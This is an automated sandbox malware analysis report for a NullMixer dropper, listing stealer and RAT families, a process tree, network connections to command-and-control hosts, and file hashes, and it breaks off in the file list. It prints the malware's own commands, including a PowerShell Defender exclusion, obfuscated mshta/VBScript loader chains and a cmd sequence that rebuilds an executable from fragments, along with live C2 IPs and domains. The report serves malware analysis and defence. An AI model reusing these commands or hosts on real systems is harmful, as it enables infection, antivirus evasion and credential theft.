Analysis Overview
SHA256
28bf29dd4aa031d8f0583b3ea8ad4fb4e67cfddec09957e7c4c423e3378b08db
Threat Level: Known bad
The file 28bf29dd4aa031d8f0583b3ea8ad4fb4e67cfddec09957e7c4c423e3378b08db.exe was found to be: Known bad.
Malicious Activity Summary
Onlylogger family
OnlyLogger
Nullmixer family
Socelars payload
GCleaner
Sectoprat family
Redline family
Socelars
Gcleaner family
Fabookie
SectopRAT
SectopRAT payload
Socelars family
Fabookie family
NullMixer
RedLine
RedLine payload
Detect Fabookie payload
OnlyLogger payload
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Loads dropped DLL
Executes dropped EXE
ASPack v2.12-2.42
Reads user/profile data of web browsers
Drops Chrome extension
Checks installed software on the system
Looks up geolocation information via web service
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Suspicious use of SetThreadContext
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Program crash
Unsigned PE
Browser Information Discovery
Suspicious use of FindShellTrayWindow
Checks SCSI registry key(s)
Suspicious use of SendNotifyMessage
Modifies Internet Explorer settings
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Kills process with taskkill
Enumerates system info in registry
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of WriteProcessMemory
Modifies data under HKEY_USERS
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-22 09:57
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-22 09:57
Reported
2024-11-22 10:00
Platform
win7-20241010-en
Max time kernel
150s
Max time network
154s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
GCleaner
Gcleaner family
NullMixer
Nullmixer family
OnlyLogger
Onlylogger family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Looks up geolocation information via web service
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 924 set thread context of 2720 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun0794d0eebce1.exe | C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun0794d0eebce1.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\setup_install.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun0741b6b6c3.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun07778dd9fc6d53.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun0794d0eebce1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun0741b6b6c3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun0752b359bd184a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\control.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\28bf29dd4aa031d8f0583b3ea8ad4fb4e67cfddec09957e7c4c423e3378b08db.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\09xU.exE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun07e3a022a8656c5ca.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun07be2debb1a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun075246a0bffeab.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun0794d0eebce1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun07cad998fb20a18.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun0752b359bd184a.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\28bf29dd4aa031d8f0583b3ea8ad4fb4e67cfddec09957e7c4c423e3378b08db.exe
"C:\Users\Admin\AppData\Local\Temp\28bf29dd4aa031d8f0583b3ea8ad4fb4e67cfddec09957e7c4c423e3378b08db.exe"
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun0741b6b6c3.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun0752b359bd184a.exe /mixone
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun07be2debb1a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun07e3a022a8656c5ca.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun075246a0bffeab.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun07778dd9fc6d53.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun07fcb30681127.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun07dc9d2dae027.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun0750d1e499.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun0794d0eebce1.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun07cad998fb20a18.exe
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun0741b6b6c3.exe
Sun0741b6b6c3.exe
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun07e3a022a8656c5ca.exe
Sun07e3a022a8656c5ca.exe
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun07778dd9fc6d53.exe
Sun07778dd9fc6d53.exe
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun07be2debb1a.exe
Sun07be2debb1a.exe
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun0752b359bd184a.exe
Sun0752b359bd184a.exe /mixone
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun07dc9d2dae027.exe
Sun07dc9d2dae027.exe
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun07fcb30681127.exe
Sun07fcb30681127.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun075246a0bffeab.exe
Sun075246a0bffeab.exe
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun0750d1e499.exe
Sun0750d1e499.exe
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun07cad998fb20a18.exe
Sun07cad998fb20a18.exe
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun0794d0eebce1.exe
Sun0794d0eebce1.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2788 -s 452
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1004 -s 276
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun07cad998fb20a18.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun07cad998fb20a18.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun07cad998fb20a18.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun07cad998fb20a18.exe") do taskkill /F -Im "%~NxU"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun07cad998fb20a18.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun07cad998fb20a18.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Users\Admin\AppData\Local\Temp\09xU.exE
09xU.EXE -pPtzyIkqLZoCarb5ew
C:\Windows\SysWOW64\taskkill.exe
taskkill /F -Im "Sun07cad998fb20a18.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun07cad998fb20a18.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun07cad998fb20a18.exe") do taskkill /F -Im "%~NxU"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Windows\SysWOW64\taskkill.exe
taskkill /F -Im "Sun07cad998fb20a18.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
C:\Windows\SysWOW64\control.exe
control .\R6f7sE.I
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun0794d0eebce1.exe
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun0794d0eebce1.exe
C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | hsiens.xyz | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | www.listincode.com | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| N/A | 127.0.0.1:49313 | N/A | tcp |
| N/A | 127.0.0.1:49316 | N/A | tcp |
| NL | 45.133.1.182:80 | N/A | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.200.3:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | topniemannpickshop.cc | udp |
| US | 8.8.8.8:53 | niemannbest.me | udp |
| US | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| FI | 135.181.129.119:4805 | N/A | tcp |
| US | 8.8.8.8:53 | www.iyiqian.com | udp |
| US | 8.8.8.8:53 | all-mobile-pa1ments.com.mx | udp |
| SG | 13.251.16.150:80 | www.iyiqian.com | tcp |
| US | 8.8.8.8:53 | buy-fantasy-football.com.sg | udp |
| US | 8.8.8.8:53 | ggg-cl.biz | udp |
| LV | 45.142.215.47:27643 | N/A | tcp |
| FI | 135.181.129.119:4805 | N/A | tcp |
| LV | 45.142.215.47:27643 | N/A | tcp |
| FI | 135.181.129.119:4805 | N/A | tcp |
| LV | 45.142.215.47:27643 | N/A | tcp |
| NL | 45.9.20.13:80 | N/A | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| NL | 45.133.1.107:80 | N/A | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| LV | 45.142.215.47:27643 | N/A | tcp |
| FI | 135.181.129.119:4805 | N/A | tcp |
| LV | 45.142.215.47:27643 | N/A | tcp |
| FI | 135.181.129.119:4805 | N/A | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| DE | 2.23.181.156:80 | www.microsoft.com | tcp |
| LV | 45.142.215.47:27643 | N/A | tcp |
| FI | 135.181.129.119:4805 | N/A | tcp |
| LV | 45.142.215.47:27643 | N/A | tcp |
| NL | 45.9.20.13:80 | N/A | tcp |
| FI | 135.181.129.119:4805 | N/A | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| LV | 45.142.215.47:27643 | N/A | tcp |
| FR | 51.178.186.149:80 | N/A | tcp |
| LV | 45.142.215.47:27643 | N/A | tcp |
| FI | 135.181.129.119:4805 | N/A | tcp |
| LV | 45.142.215.47:27643 | N/A | tcp |
| LV | 45.142.215.47:27643 | N/A | tcp |
| NL | 45.9.20.13:80 | N/A | tcp |
| FI | 135.181.129.119:4805 | N/A | tcp |
| FI | 135.181.129.119:4805 | N/A | tcp |
| LV | 45.142.215.47:27643 | N/A | tcp |
| LV | 45.142.215.47:27643 | N/A | tcp |
| FI | 135.181.129.119:4805 | N/A | tcp |
| NL | 45.9.20.13:80 | N/A | tcp |
| LV | 45.142.215.47:27643 | N/A | tcp |
| FI | 135.181.129.119:4805 | N/A | tcp |
| LV | 45.142.215.47:27643 | N/A | tcp |
| LV | 45.142.215.47:27643 | N/A | tcp |
| LV | 45.142.215.47:27643 | N/A | tcp |
| NL | 45.9.20.13:80 | N/A | tcp |
| LV | 45.142.215.47:27643 | N/A | tcp |
| FI | 135.181.129.119:4805 | N/A | tcp |
| FI | 135.181.129.119:4805 | N/A | tcp |
| LV | 45.142.215.47:27643 | N/A | tcp |
Files
\Users\Admin\AppData\Local\Temp\setup_installer.exe
| MD5 | d07bd0ebe80eee3d1566618caa51672f |
| SHA1 | 28e747a9cbd035992c8fc7381f6c060dfe4bcbbe |
| SHA256 | c1324e6974abc969b3dd0fa54a25c4089147352c81aeda3cbb2a24662866ad81 |
| SHA512 | 2dccd7c8af21010ab54ca366a2a6deb2ef6a1355604ebb0e0bd158e4d761f32d632b3001b321cc174423a5ff303c3a1df4054f24ef7d04b48167522eb303d9ab |
\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\setup_install.exe
| MD5 | 2d62b8cf0d215971e12220d96a099e81 |
| SHA1 | 72e43b82e9510321dbb5130d35d09acd850c7ad8 |
| SHA256 | bec993083a69304244f13e191173e31d23c634567ab21484258195086112aa40 |
| SHA512 | e0763f93143060599658b64cc3c0fa8e8be62c4af2567ab08868492546f200bb5a91b367d2eea296b0a6d71c39a0f0000d71a66aabc1d36664d01dedbfbc5f59 |
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun07778dd9fc6d53.exe
| MD5 | ecc773623762e2e326d7683a9758491b |
| SHA1 | ad186c867976dc5909843418853d54d4065c24ba |
| SHA256 | 8f97a40b4d9cf26913ab95eec548d75a8dad5a1a24d992d047e080070282d838 |
| SHA512 | 40e30981f533b19123ec3d84276a28acd282c01907398ca6d67155901cfaf2c2d6355dc708d0ecfc6c21b5c671b4c3bb87eeb53183b7085474a2acd302f038a4 |
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun07fcb30681127.exe
| MD5 | 4a01f3a6efccd47150a97d7490fd8628 |
| SHA1 | 284af830ac0e558607a6a34cf6e4f6edc263aee1 |
| SHA256 | e29476ee4544a426c1518728034242be3e6821f79378ae2faffedecc194c5a97 |
| SHA512 | 4d0e886e3227f09c177f1a9836ee65766aafc7f48458c944da1afc061106dfbbf47455e54065d22de955b44044817ac900ee9ac80b434ad73bf53262acb49519 |
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun075246a0bffeab.exe
| MD5 | 118cf2a718ebcf02996fa9ec92966386 |
| SHA1 | f0214ecdcb536fe5cce74f405a698c1f8b2f2325 |
| SHA256 | 7047db11a44cfcd1965dcf6ac77d650f5bb9c4282bf9642614634b09f3dd003d |
| SHA512 | fe5355b6177f81149013c444c244e540d04fbb2bcd2bf3bb3ea9e8c8152c662d667a968a35b24d1310decb1a2db9ac28157cda85e2ef69efee1c9152b0f39089 |
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun07be2debb1a.exe
